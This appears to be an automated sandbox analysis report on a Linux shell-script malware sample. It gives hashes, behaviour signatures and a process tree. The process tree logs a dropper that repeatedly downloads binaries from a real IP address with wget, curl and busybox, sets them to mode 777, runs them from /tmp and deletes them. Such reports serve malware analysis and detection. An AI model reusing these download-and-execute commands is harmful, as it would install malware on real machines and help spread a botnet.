Analysis
-
max time kernel
52s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
14-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
-
Size
10KB
-
MD5
aae1d5abee7934f0e4222cffef0b2329
-
SHA1
068230ae72391a90d17b4f8c26d9665b3c7971be
-
SHA256
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
-
SHA512
1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
-
SSDEEP
192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 1574 chmod 1646 chmod 1666 chmod 1514 chmod 1678 chmod 1598 chmod 1604 chmod 1640 chmod 1652 chmod 1544 chmod 1568 chmod 1616 chmod 1520 chmod 1538 chmod 1562 chmod 1586 chmod 1592 chmod 1622 chmod 1634 chmod 1672 chmod 1532 chmod 1556 chmod 1628 chmod 1526 chmod 1550 chmod 1580 chmod 1610 chmod 1660 chmod -
Executes dropped EXE 28 IoCs
Processes:
zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsAYBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLofkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH71vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUYARkfCaTjArNVROyobHsVYM6en6J2bTk7iQcmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzkuX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2CmY0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxpkwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJpooPG8wQROD6wksRWAfxchOtNyCZDfqXH7O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsAYBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLofioc pid Process /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 1515 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 1521 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 1527 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 1533 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA 1539 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof 1545 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 1551 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 1557 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 1563 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 1569 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 1575 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 1581 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 1587 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 1593 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m 1599 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY 1605 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ 1611 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr 1617 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk 1623 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm 1629 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK 1635 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 1641 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE 1647 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp 1653 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ 1661 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 1667 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA 1673 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof 1679 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp curl File opened for modification /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl File opened for modification /tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm curl File opened for modification /tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ curl File opened for modification /tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7 curl File opened for modification /tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof curl File opened for modification /tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8 curl File opened for modification /tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA curl File opened for modification /tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m curl File opened for modification /tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ curl File opened for modification /tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk curl File opened for modification /tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY curl File opened for modification /tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK curl File opened for modification /tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE curl
Processes
-
/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh/tmp/9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh1⤵PID:1505
-
/bin/rm/bin/rm bins.sh2⤵PID:1506
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1507
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1513
-
-
/bin/chmodchmod 777 zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE./zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm zNY2yNjdAmMqTNdTvLgiU2uOxdlRbbOsDE2⤵PID:1516
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1517
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1519
-
-
/bin/chmodchmod 777 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp./5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm 5QahJXzrUnujyP1ksHcSV4ekNdBHqPRmxp2⤵PID:1522
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1525
-
-
/bin/chmodchmod 777 Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK./Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm Y0ZXt4mblX1kfaAX0V7DCL0tY6lmNmygxK2⤵PID:1528
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1529
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1531
-
-
/bin/chmodchmod 777 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP8./8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm 8QbZDuGMN0Pmhda9Jc1U7MqRRrtpaoRwP82⤵PID:1534
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1537
-
-
/bin/chmodchmod 777 O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA./O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm O2rajdeuY74yEUSjO72Rf0z0jaal7B7SsA2⤵PID:1540
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1543
-
-
/bin/chmodchmod 777 YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof./YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm YBdSnAgfCGY9UHqbtwa0d3XTjzkPVDfLof2⤵PID:1546
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1549
-
-
/bin/chmodchmod 777 kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ./kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm kwmk7TZ5XaauHSZZWkYwtfpIf8Mvz5o6XJ2⤵PID:1552
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1553
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1555
-
-
/bin/chmodchmod 777 pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/pooPG8wQROD6wksRWAfxchOtNyCZDfqXH7./pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm pooPG8wQROD6wksRWAfxchOtNyCZDfqXH72⤵PID:1558
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1561
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1564
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1567
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1570
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1571
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1573
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1576
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1577
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1579
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1582
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1585
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1588
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1591
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1594
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1597
-
-
/bin/chmodchmod 777 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m./1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm 1vgXYGia2ksHCm3rEdIvB1woHjPbzRi98m2⤵PID:1600
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1603
-
-
/bin/chmodchmod 777 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY./7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm 7wPrawTciHwtD4xlKzKP28kFQ47KH1YCUY2⤵PID:1606
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1609
-
-
/bin/chmodchmod 777 ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ./ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm ARkfCaTjArNVROyobHsVYM6en6J2bTk7iQ2⤵PID:1612
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1615
-
-
/bin/chmodchmod 777 cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr./cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm cmw3dYlBcvlAkQQX8t6u671qIC5hpVF4kr2⤵PID:1618
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1621
-
-
/bin/chmodchmod 777 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk./1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm 1PhdRZGU4ZpTrupg3Xg1LTaHw69Y7nqJzk2⤵PID:1624
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵PID:1627
-
-
/bin/chmodchmod 777 uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm./uX9sIze9RdxkijyvHBaiaeoAQ4zAKcS2Cm2⤵
- Executes dropped EXE
PID:1629
-
-
